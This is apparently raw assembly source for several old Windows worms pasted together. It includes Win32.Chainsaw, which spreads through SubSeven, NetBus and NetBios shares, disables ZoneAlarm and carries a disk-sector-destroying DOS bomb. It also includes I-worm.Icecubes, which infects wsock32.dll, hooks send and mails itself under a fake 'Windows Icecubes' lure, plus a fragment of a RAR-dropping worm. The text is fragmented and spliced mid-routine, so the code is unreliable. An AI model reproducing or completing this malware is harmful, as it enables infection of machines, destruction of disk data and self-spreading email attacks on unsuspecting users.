push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
end_file2:
push MEM_RELEASE
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
end_file:
call close_file ;close the archive
push FILE_ATTRIBUTE_READONLY
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
close_file:
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
ret
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
SVCHandler:
ret
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
;requestz)
push 0
call ExitThread ;terminate this thread
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
;============================================================================
;
;
; NAME: Win32.Chainsaw v1.01
; TYPE: NetBios/SubSeven/NetBus worm.
; DATE: July - September 2000.
; AUTHOR: T-2000 / Immortal Riot.
; E-MAIL: T2000_@hotmail.com
; PAYLOAD: Sector trashing.
;
; FEATURES:
;
; - Disables ZoneAlarm firewall.
; - Not visible in 9x tasklist.
; - Sends usenet message on installation.
; - DoS'es random hosts on 31st of any month.
; - Anti-debugging code.
;
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
; or NetBios, and then installs itself in the systems it can get access
; to. Its main payload is to IGMP DoS random Internet hosts on every 31st
; of the month, which will BSOD every released version of Windoze 95/98
; that isn't patched or firewalled.
;
;============================================================================
; I've kept the code clear and understandable for everyone, no optimizations
; of any kind, mainly due to the file alignment, the filesize will usually just
; stay the same whether your code is optimized or not.
.386
.MODEL FLAT
.DATA
JUMPS
EXTRN WSAGetLastError:PROC
EXTRN ioctlsocket:PROC
EXTRN ExitProcess:PROC
EXTRN WSAStartup:PROC
EXTRN WritePrivateProfileStringA:PROC
EXTRN WSACleanup:PROC
EXTRN socket:PROC
EXTRN closesocket:PROC
EXTRN setsockopt:PROC
EXTRN InternetGetConnectedState:PROC
EXTRN DeleteFileA:PROC
EXTRN connect:PROC
EXTRN setsockopt:PROC
EXTRN PeekMessageA:PROC
EXTRN SetFileAttributesA:PROC
EXTRN GetSystemDirectoryA:PROC
EXTRN CreateFileA:PROC
EXTRN recv:PROC
EXTRN send:PROC
EXTRN sendto:PROC
EXTRN CloseHandle:PROC
EXTRN GetSystemTime:PROC
EXTRN GetModuleHandle
EXTRN RegOpenKeyExA:PROC
EXTRN RegSetValueExA:PROC
EXTRN RegCloseKey:PROC
EXTRN ReadFile:PROC
EXTRN CopyFileA:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetCancelConnection2A:PROC
EXTRN SetErrorMode:PROC
EXTRN GetModuleFileNameA:PROC
EXTRN FindWindowA:PROC
EXTRN PostMessageA:PROC
EXTRN GetTickCount:PROC
EXTRN WriteFile:PROC
EXTRN GetLocalTime:PROC
EXTRN WinExec:PROC
EXTRN select:PROC
EXTRN GetPrivateProfileStringA:PROC
EXTRN GetModuleHandleA:PROC
EXTRN GetProcAddress:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetEnumResourceA:PROC
EXTRN WNetOpenEnumA:PROC
EXTRN WNetCloseEnum:PROC
EXTRN RegQueryValueExA:PROC
EXTRN gethostbyname:PROC
EXTRN inet_ntoa:PROC
S7_Upload_Req DB 'RTFChainsaw.exe'
End_S7_Upload_Req:
S7_Upload_Size DB 'SFT046144'
End_S7_Upload_Size:
S7_Exec_Req DB 'FMXChainsaw.exe'
End_S7_Exec_Req:
Nuke_File DB 'BBQ666.COM', 0
sz_Kernel32 DB 'KERNEL32', 0
sz_RegServProc DB 'RegisterServiceProcess', 0
Win_Ini_Run_Key DB 'run', 0
Windows_Section DB 'windows', 0
Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0
ZoneAlarm_Window DB 'ZoneAlarm', 0
Reg_Handle_1 DD 0
Reg_Handle_2 DD 0
sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0
Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\'
Account_Index DB '00000000', 0
sz_Def_News_Acc DB 'Default News Account', 0
sz_NNTP_Server DB 'NNTP Server', 0
Size_Acc_Buffer DD 9
Size_NNTP_Buf DD 128
; Header.
; Body.
DB 'WHO WILL SURVIVE', 0Dh, 0Ah
DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah
; End-of-data command.
MsDos_Sys DB 'T:\MSDOS.SYS', 0
Win_Dir_Key DB 'WinDir', 0
Paths_Section DB 'Paths', 0
Slash_Win_Ini DB '\'
Win_Ini DB 'WIN.INI', 0
Remote_Drive DB 'T:', 0
Cover_Name DB '\WINMINE.EXE', 0
Remote_Trojan DB 'T:'
Root_Dropper DB '\Chainsaw.exe', 0
Run_Key_Name DB 'Mines', 0
Boole_False DD 0
Boole_True DD 1
NetBios_Remote DB '\\666.666.666.666', 0
Time_Out: DD 1 ; - Seconds.
DD 500 ; - Milliseconds.
IO_Time_Out DD 5000
Nuke_Conn: DW AF_INET
DW 0
Nuke_IP DD 0
DB 8 DUP(0)
Sub7_Conn: DW AF_INET
DWBI 27374
Sub7_IP DD 0
DB 8 DUP(0)
NetBus_Conn: DW AF_INET
DWBI 12345
NetBus_IP DD 0
DB 8 DUP(0)
NetBus_Conn_2: DW AF_INET
DWBI (12345+1)
NetBus_IP_2 DD 0
DB 8 DUP(0)
NetBios_Conn: DW AF_INET
DWBI 139
NetBios_IP DD 0
DB 8 DUP(0)
Win_Dir DB 260 DUP(0)
Default_String DB 0
Net_Struc_Count DD 1
Enum_Buf_Size DD 666
Enum_Buffer DB 666 DUP(0)
Net_Resource_Struc:
DD 0
DD 0
DD 0
DD 0
DD 0
DD OFFSET NetBios_Remote
DD 0
DD 0
Net_Resource: DD 0
DD 0
DD 0
Net_Usage DD 0
Net_Local_Name DD 0
Net_Remote_Name DD 0
DD 0
DD 0
Select_Struc:
Sock_Count DD 3
Sub7_Socket DD 0
NetBus_Socket DD 0
NetBios_Socket DD 0
IGMP_Socket DD 0
News_Socket DD 0
NetBus_Socket_2 DD 0
Connect_Select: DD 4 DUP(0)
Temp DD 0
Random_Init DD 0
Enum_Handle DD 0
Size_Cover_Path DD 0
System_Time DW 8 DUP(0)
.CODE
DB '[-T2IR-]', 0
START:
PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out
CALL SetErrorMode ; without displaying shit.
CALL GetTickCount
Exit: PUSH 0
CALL ExitProcess
INC EAX
JZ Exit
OR EAX, EAX
JNZ Do_Random_IP
OR EAX, EAX
JNZ Close_Reg_1
OR EAX, EAX
JNZ Close_Reg_1
OR EAX, EAX
JNZ Close_Reg_2
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
PUSH 16
PUSH OFFSET Usenet_Conn
PUSH News_Socket
CALL connect
INC EAX
JZ Close_Reg_2
INC EAX
JZ Close_News
PUSH 0
PUSH 6
PUSH OFFSET s_POST
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
INC EAX
JZ Close_News
PUSH 0
PUSH (End_News_Message-News_Message)
PUSH OFFSET News_Message
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
INC EAX
JZ Close_News
Send_QUIT: PUSH 0
PUSH 6
PUSH OFFSET s_QUIT
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
SHL EBX, 8
MOV BL, AL
SHL EBX, 8
MOV BL, AL
SHL EBX, 8
MOV BL, AL
INC EAX
JZ Do_Random_IP
JMP Do_Random_IP
Copy_ASCIIZ_IP: LODSB
STOSB
INC EAX
JZ Chk_Inet_State
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
INC EAX
JZ Close_Sub7
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
INC EAX
JZ Close_NetBus
MOVSD
MOVSD
MOVSD
MOVSD
PUSH 0
PUSH (End_S7_Upload_Req-S7_Upload_Req)
PUSH OFFSET S7_Upload_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
PUSH 0 ; Fetch the reply, it should
PUSH 512 ; be 'TID' if all is OK.
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
PUSH 0
PUSH (End_S7_Upload_Size-S7_Upload_Size)
PUSH OFFSET S7_Upload_Size
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBus
Check_UL_Reply: PUSH 0
PUSH 512
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
CMP [EDI+5], 'ccus' ; Check for 'success'.
JNE Try_NetBus ; Bail on error.
PUSH 0
PUSH (End_S7_Exec_Req-S7_Exec_Req)
PUSH OFFSET S7_Exec_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBios
PUSH 0
PUSH (End_NB_Password-NB_Password)
PUSH OFFSET NB_Password
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
Upload_Worm: PUSH 0
PUSH (End_NB_Upload_Req-NB_Upload_Req)
PUSH OFFSET NB_Upload_Req
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
INC EAX
JZ Try_NetBios
INC EAX
JZ Try_NetBios
OR EBX, EBX
JNZ Close_NetBus_2
INC EBX
JZ Close_NetBios
PUSH 0
PUSH (End_NB_Exec_File-NB_Exec_File)
PUSH OFFSET NB_Exec_File
PUSH NetBus_Socket
CALL send
MOV ECX, 8
REP MOVSD
JMP Chk_Inet_State
PUSH 4
PUSH OFFSET IO_Time_Out
PUSH SO_SNDTIMEO
PUSH SOL_SOCKET
PUSH EBX
CALL setsockopt
RETN
Random_AL_254:
MOV AL, 254
Random_AL: MOVZX EAX, AL
CALL GetTickCount
RCL EAX, 2
XCHG AL, AH
ADD AL, 66h
PUSH 32
POP ECX
POP ECX
RETN
; And I thought NetBus was a lame buggy piece of shit, nothing beats
; SubSeven, even though it's one of the most advanced RATs
; available these days, it is programmed pretty badly, the author
; clearly has no understanding of TCP/IP whatsoever, he doesn't
; even terminate his TCP commands with a terminator for example,
; which will lead to fragmented packets fucking up. Also, when you
; supply wrong commands to the server, it will downright hang itself.
; And as a bonus, SubSeven infected systems become slooow, not sure
; exactly why.. I'd say, leave writing RATs to people who know
; their stuff, like the authors of Back Orifice 2000.
OR EAX, EAX
JNZ Exit_Loc_Share
OR EAX, EAX
JNZ Close_Enum
CALL Locate_Shares
JMP Enum_Resource
OR EAX, EAX
JNZ Enum_Resource
JMP Enum_Resource
Exit_Loc_Share: POPAD
RETN
PUSH EBX
CALL CloseHandle
; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
; Smashes disk structures of 1st 2 fixed disks, should be fast and
; unrecoverable.
; .MODEL TINY
; .CODE
;
; ORG 100h
;START:
; MOV AX, 3513h ; Grab INT 13h's address.
; INT 21h
;
; MOV Int13h, BX ; Store it for later.
; MOV Int13h+2, ES
;
; PUSH CS
; POP ES
;
; XOR SI, SI
;
; MOV BX, OFFSET Trash_Text
; MOV CX, (End_Trash_Text-Trash_Text)
;
; ; Decrypt trash text.
;
;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h
;
; INC SI
;
; LOOP Decrypt_Text
;
; INC CX ; CX = 0001h.
;
; MOV DX, 80h+1 ; Start trashing backwards
; ; from 2nd HDD.
;
;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track
; PUSHF ; 0 with our text.
; DB 9Ah
;Int13h DW 0, 0
;
; INC DH ; Smashed all heads?
; JNZ Kill_Head
;
; DEC DL ; Smashed all HDD's ?
; JS Kill_Head
;
;Exit: RETN ; Back to Windoze..
;
; DB 'T2' ; To pad this file to 666.
;
; ; XOR 66h encrypted:
;
; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
; ; THE TEXAS CHAIN SAW MASSACRE..."
;
; ; (I adore this movie :)
;
;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h
;End_Trash_Text:
; END START
DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h
END START
.386
.model flat, stdcall
locals
jumps
extrn ExitProcess:PROC
extrn DialogBoxParamA:PROC
extrn GetModuleHandleA:PROC
extrn EndDialog:PROC
extrn GetWindowRect:PROC
extrn GetDesktopWindow:PROC
extrn MoveWindow:PROC
extrn CreateThread:PROC
extrn SendDlgItemMessageA:PROC
extrn SetDlgItemTextA:PROC
extrn CloseHandle:PROC
extrn GetDlgItemTextA:PROC
extrn GetModuleHandleA:PROC
extrn GetVersion:PROC
.data
Start:
xor ebp, ebp
CheckWindowsVersion:
call GetVersion
or eax, eax
jz ReturnToWormHost
MainRoutines:
pushad
call GET_GETPROCADDRESS_API_ADDRESS
call GET_WINDIR
call GET_SYSDIR
call INFECT_WSOCK
call COPY_HOST_FILE
popad
ReturnToWormHost:
jmp OriginalHost
include windows.inc
include wsocks.inc
include myinc.inc
; get_gpa.inc data
kernel32address dd 0BFF70000h
numberofnames dd ?
addressoffunctions dd ?
addressofnames dd ?
addressofordinals dd ?
AONindex dd ?
AGetProcAddress db "GetProcAddress", 0
AGetProcAddressA dd 0
; directory.inc data
currentdir db 100h dup(0)
sysdir db 100h dup(0)
windir db 100h dup(0)
AGetSystemDirectory db "GetSystemDirectoryA",0
AGetWindowsDirectory db "GetWindowsDirectoryA",0
ASetCurrentDirectory db "SetCurrentDirectoryA",0
; infect_wsock.inc
wsock32dll db "Wsock32.dll",0
wsock32inf db "Wsock32.inf",0
ACopyFile db "CopyFileA",0
infectionflag db 0
AFindFirstFile db "FindFirstFileA",0
myfinddata WIN32_FIND_DATA <>
filesize dd 0
memory dd 0
ADeleteFile db "DeleteFileA",0
; infect_file.inc
ASetFileAttributes db "SetFileAttributesA",0
ACreateFile db "CreateFileA",0
ACreateFileMapping db "CreateFileMappingA",0
AMapViewOfFile db "MapViewOfFile",0
filehandle dd 0
maphandle dd 0
mapaddress dd 0
PEheader dd 0
imagebase dd 0
imagesize dd 0
wnewapiaddress dd 0
AUnmapViewOfFile db "UnmapViewOfFile",0
ACloseHandle db "CloseHandle",0
ASetFilePointer db "SetFilePointer",0
ASetEndOfFile db "SetEndOfFile",0
ASetFileTime db "SetFileTime",0
; hook_api.inc
woldapiaddress dd 0
; rva_to_raw.inc
rva2raw dd 0
; get_api.inc
user32address dd 0
wsock32address dd 0
; create_ini_file.inc
inifile db "wininit.ini",0
writtensize dw 0
inicrlf db 0dh,0ah,0
rename db "[rename]",13,10
slashsign db "\",0
equalsign db "=",0
writtenbytes dd 0
AWriteFile db "WriteFile",0
; ws_copy_host_file
AGetModuleFileName db "GetModuleFileNameA",0
; get_bases.inc
ALoadLibrary db "LoadLibraryA",0
k32 db "KERNEL32.dll",0
user32 db "USER32.dll",0
wsock32 db "WSOCK32.dll",0
; host_code.inc
dlgrect RECT <>
desktoprect RECT <>
dlgwidth dd 0
dlgheight dd 0
threadid dd 0
initflag dd 0
okflag dd 0
flag dd 0
pastvalue dd 0
currentvalue db '2',0
doneflag dd 0
value11 db "Days",0
value12 db "Weeks",0
value13 db "Months",0
value14 db "Years",0
value3 db "5000",0
value4 db "17",0
; ic.asm
hInst dd 0
; write_to_file.inc
passwordfile db "icecube.txt",0
; ws_intercept.inc
socketh dd 0
status db 0
AGlobalAlloc db "GlobalAlloc",0
fromaddress dd 0
fromsize dd 0
rcptnumber dd 0
rcpt_buffer_address dd 0
rcpt_size_address dd 0
totalrcptsize dd 0
fromtag db 'From:',0
totag db 'To:',0
mimeendtag db '>',0
mimefrom_address dd 0
mimefromsize dd 0
fromstatus db 0
tostatus db 0
toendtag db 'Subject:',0
mimetosize dd 0
mimeto_address dd 0
; ws_b64_encoder.inc
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
db 'wxyz0123456789+/'
; ws_attachment
wsock2 db "Wsock2.dll",0
smHnd dd 0
dmHnd dd 0
bytesread dd 0
encodedsize dd 0
AReadFile db "ReadFile",0
AGetFileSize db "GetFileSize",0
; ws_send_mail
email_buffer_address dd 0
email_size dd 0
datatag db 'DATA',0dh,0ah
emailid db 'Message-ID: <a1234>',0dh,0ah
emailstart db 'Subject: Fw: Windows Icecubes !',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db 0dh,0ah
db '----- Original Message -----', 0dh,0ah
db 0dh,0ah
db '>Look at what I found on the web. This tool scans your system for hidden Windows settings.', 0dh, 0ah
db '>These settings, which are better known as the "Windows Icecubes", were built in Windows by', 0dh,0ah
db '>the programmers at Microsoft and were supposed to be kept secret. ', 0dh,0ah
db '>',0dh,0ah
db '>Just take a look, cause I think you might want to make some changes ;).',0dh,0ah
db '>',0dh,0ah
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="Icecubes.exe"'
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="Icecubes.exe"',0dh,0ah,0dh,0ah
emailend db 0dh,0ah
emailtail db 0dh,0ah,0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah
endtag db 0Dh,0Ah,2Eh,0Dh,0Ah
timedate SYSTEMTIME <>
AMessageBox db "MessageBoxA",0
AGetSystemTime db "GetSystemTime",0
msgmessage db "Windows detected icecubes on your harddrive.",10,13
db "This may cause the system to stop responding.",10,13
db "Do you want Windows to remove all icecubes ?",0
windowtitle db "I-worm.Icecubes / f0re",0
ASend db "send",0
ARecv db "recv",0
recvbuffer db 100h dup(0)
LoadExportTableData:
mov edi, [ebp + kernel32address] ; get exporttable
add edi, [edi + 3ch] ; address from
mov esi, [edi + 78h] ; kernel's PE header
add esi, [ebp + kernel32address]
BeginProcAddressSearch:
mov esi, [ebp + addressofnames] ; search for GetProc
mov [ebp + AONindex], esi ; Address API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
xor ecx, ecx
lea ebx, [ebp + AGetProcAddress]
TryAgain:
mov esi, ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [esi], 0 ; did the entire string
je GotIt ; match ?
jmp MatchByte
NextOne:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address] ; align with kernelbase
jmp TryAgain
GotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi]
shl eax, 2 ; address of function =
mov esi, [ebp + addressoffunctions] ; ordinal * size of
add esi, eax ; entry of address
mov edi, dword ptr [esi] ; table + base of
add edi, [ebp + kernel32address] ; addresstable
mov [ebp + AGetProcAddressA], edi ; save GPA address
ret
GET_GETPROCADDRESS_API_ADDRESS endp
GET_WSOCK32_BASE_ADDRESS proc
LoadWsock32:
lea eax, [ebp + wsock32] ; not found, then
push eax ; load the dll
lea eax, [ebp + ALoadLibrary] ; first
call GETAPI
mov [ebp + wsock32address], eax
ret
GET_WSOCK32_BASE_ADDRESS endp
GET_USER32_BASE_ADDRESS proc
GetUser32Base:
lea eax, [ebp + user32]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
mov [ebp + user32address], eax
ret
GET_USER32_BASE_ADDRESS endp
GETAPI proc
push eax
push dword ptr [ebp + kernel32address] ; load kernelbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax ; call the api
ret ; return
GETAPI endp
GETUAPI proc
push eax
push dword ptr [ebp + user32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETUAPI endp
GETWAPI proc
push eax
push dword ptr [ebp + wsock32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETWAPI endp
GetWindowsDir:
push 128h ; size of dirstring
lea eax, [ebp + windir] ; save it here
push eax
lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir
call GETAPI
ret
GET_WINDIR endp
GET_SYSDIR proc
GetSystemDir:
push 128h ; size of dirstring
lea eax, [ebp + sysdir] ; save it here
push eax
lea eax, [ebp + AGetSystemDirectory] ; get system dir
call GETAPI
ret
GET_SYSDIR endp
SET_WINDIR proc
SetWindowsDir:
lea eax, [ebp + windir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_WINDIR endp
SET_SYSDIR proc
SetSystemDir:
lea eax, [ebp + sysdir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_SYSDIR endp
INFECT_WSOCK proc
WsockSetSystemDirectory:
call SET_SYSDIR
CopyWSockFile:
push 00h
lea eax, [ebp + wsock32inf]
push eax
lea eax, [ebp + wsock32dll]
push eax
lea eax, [ebp + ACopyFile]
call GETAPI
SearchWsockFile:
mov [ebp + infectionflag], 00h
lea eax, [ebp + myfinddata] ; win32 finddata structure
push eax
lea eax, [ebp + wsock32inf] ; get wsock32.inf
push eax
lea eax, [ebp + AFindFirstFile] ; find the first file
call GETAPI
cmp eax, 0FFFFFFFh
je WsockEndSearch
GoInfectWsockInf:
mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize
mov [ebp + filesize], ecx ; save the filesize
add ecx, Leap - Start + 1000h ; filesize + virus
mov [ebp + memory], ecx ; + workspace = memory
call INFECT_FILE
cmp [ebp + infectionflag], 01
je DeleteWsockFile
call CREATE_INI_FILE
jmp WsockEndSearch
DeleteWsockFile:
lea eax, [ebp + wsock32inf]
push eax
lea eax, [ebp + ADeleteFile]
call GETAPI
DeleteIniFile2:
call SET_WINDIR
lea eax, [ebp + inifile]
push eax
lea eax, [ebp + ADeleteFile]
call GETAPI
WsockEndSearch:
ret
INFECT_WSOCK endp
INFECT_FILE proc
SetAttributesToNormal:
push 80h
lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename
push esi
lea eax, [ebp + ASetFileAttributes]
call GETAPI
OpenFile:
push 0 ; template handle=0
push 20h ; attributes=any file
push 3 ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
push esi ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
MapViewOfFile:
push dword ptr [ebp + memory] ; memory to map
push 0 ; file offset
push 0 ; file offset
push 2 ; file map write mode
push eax ; file map handle
lea eax, [ebp + AMapViewOfFile] ; ok map the file
call GETAPI
or eax, eax
jz CloseMap
mov esi, eax ; esi= base of map
mov [ebp + mapaddress], esi ; save that base
DoSomeChecks:
cmp word ptr [esi], 'ZM' ; an exe file?
jne UnmapView
cmp word ptr [esi + 38h], 'll' ; already infected?
jne OkGo
mov [ebp + infectionflag], 1 ; set infectionflag
jmp UnmapView
OkGo:
mov ebx, dword ptr [esi + 3ch]
cmp ebx, 200h
ja UnmapView
add ebx, esi
cmp dword ptr [ebx], 'EP' ; is it a PE file ?
jne UnmapView
LocateBeginOfLastSection:
movzx ebx, word ptr [esi + 20d] ; optional header size
add ebx, 24d ; file header size
movzx eax, word ptr [esi + 6h] ; no of sections
dec eax ; (we want the last-1
mov ecx, 28h ; sectionheader)
mul ecx ; * header size
add esi, ebx ; esi = begin of last
add esi, eax ; section's header
ChangeLastSectionHeader:
or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h
NewAlignedPhysicalSize:
mov eax, dword ptr [esi + 10h] ; old phys size
push eax ; save it
VirtualSizeCheck:
mov edi, dword ptr [esi + 8h] ; get old
cmp eax, edi ; virtualsize
jge NewVirtualSize
VirtualSizeIsVirtual:
add edi, Leap-Start
mov eax, edi
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx ; and align it to
inc eax ; the sectionalign
mul ecx
NewVirtualSize:
mov [esi + 8h], eax ; save new value
NewAlignedImageSize:
mov eax, dword ptr [esi + 0ch] ; get virtual offset
add eax, dword ptr [esi + 8h] ; + new virtual size
mov [ebp + imagesize], eax ; = new imagesize
NewAlignedFileSize:
mov eax, dword ptr [esi + 10h] ; get new phys size
add eax, dword ptr [esi + 14h] ; add offset of phys
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 3ch]
div ecx ; and align it to
inc eax ; the filealign
mul ecx
mov [ebp + filesize], eax ; size = filesize
CalculateNewWsockApiAddress:
pop eax
push eax
add eax, dword ptr [esi + 0ch] ; + virtual offset
add eax, InterceptWsockApiCall - Start ; + ip
mov [ebp + wnewapiaddress], eax ; new api address
jmp HookDaApi
HookDaApi:
push esi
call HOOK_API
pop esi
CopyVirusToEndOfFile:
pop eax
mov edi, eax
add edi, [ebp + mapaddress] ; mapaddress
add edi, [esi + 14h] ; add raw data offset
lea esi, [ebp + Start] ; copy virus
mov ecx, (Leap-Start)/4 + 4
cld
rep movsd
UpdatePEHeaderWithChanges:
mov esi, [ebp + mapaddress]
mov word ptr [esi + 38h], 'll' ; set infectionmark
mov esi, [ebp + PEheader]
mov eax, [ebp + imagesize]
mov [esi + 50h], eax ; set new imagesize
UnmapView:
push dword ptr [ebp + mapaddress]
lea eax, [ebp + AUnmapViewOfFile]
call GETAPI
CloseMap:
push dword ptr [ebp + maphandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
push 0
push 0
push dword ptr [ebp + filesize]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFilePointer]
call GETAPI
CloseFile:
push dword ptr [ebp + myfinddata.fd_ftLastWriteTime]
push dword ptr [ebp + myfinddata.fd_ftLastAccessTime]
push dword ptr [ebp + myfinddata.fd_ftCreationTime]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFileTime]
call GETAPI
InfectionError:
push dword ptr [ebp + myfinddata.fd_dwFileAttributes]
lea eax, [ebp + myfinddata.fd_cFileName]
push eax
lea eax, [ebp + ASetFileAttributes]
call GETAPI
ret
INFECT_FILE endp
;===========================[ ic-hook_api.inc ]=============================;
HOOK_API proc
LoadWSockExportTableData:
mov edi, [ebp + PEheader]
mov esi, dword ptr [edi + 78h] ; rva export table
push esi
mov eax, dword ptr [esi + 1Ch] ; get ra of table with
pop esi
push esi
mov eax, dword ptr [esi + 20h] ; get ra of table with
pop esi
push esi
BeginSendAddressSearch:
mov esi, [ebp + addressofnames] ; search for
mov [ebp + AONindex], esi ; API in names
mov edi, [esi] ; table
HookSendApi:
lea ebx, [ebp + ASend]
OkTryAgain:
mov esi, ebx
MatchByteNow:
cmpsb
jne NextOneNow
cmp byte ptr [esi], 0 ; did the entire string
je YesGotIt ; match ?
jmp MatchByteNow
NextOneNow:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
push ebx
push ecx
pop ecx
pop ebx
jmp OkTryAgain
YesGotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi] ; offset of address
shl eax, 2 ; of function = ordinal
mov esi, [ebp + addressoffunctions] ; * size of entry of
add esi, eax ; address table
mov edi, dword ptr [esi] ; get address
SaveNewWsockApiAddress:
